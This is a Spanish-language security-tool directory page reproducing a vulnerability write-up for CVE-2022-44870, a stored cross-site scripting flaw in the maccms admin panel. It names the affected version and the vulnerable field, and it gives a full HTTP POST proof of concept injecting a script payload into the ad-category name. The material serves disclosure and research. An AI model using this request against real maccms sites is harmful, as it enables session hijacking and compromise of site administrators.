Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-44870 — maccms admin+ ataques XSS | Kitploit
Herramientas/GitHubGitHub/cedric1314/cve-2022-44870
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubcedric1314/cve-2022-44870

CVE-2022-44870

maccms admin+ ataques XSS

Ver Repositorio
2hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-44870

maccms admin+ ataques xss

Resumen

Información del sitio web del fabricante: https://maccms.pro

Dirección de descarga del código fuente: https://github.com/maccmspro/maccms10.git

  1. Versión afectada: V2021.1000.2000

    图片
  2. Detalles de la vulnerabilidad

https://github.com/maccmspro/maccms10/issues/23

Ir al panel de administración, ir a Básicos > Gestión de anuncios > Nombre,

Insertar payload1 en el cuadro de nombre:

Puede causar ataques XSS.

Nombre de la vulnerabilidad: XSS almacenado

Nivel de vulnerabilidad: Riesgo medio

Ubicación de la vulnerabilidad: Gestión de anuncios --> nombre

Insertar en cat_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

图片

图片
  1. Replicación de la vulnerabilidad y POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Descargar herramienta

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

图片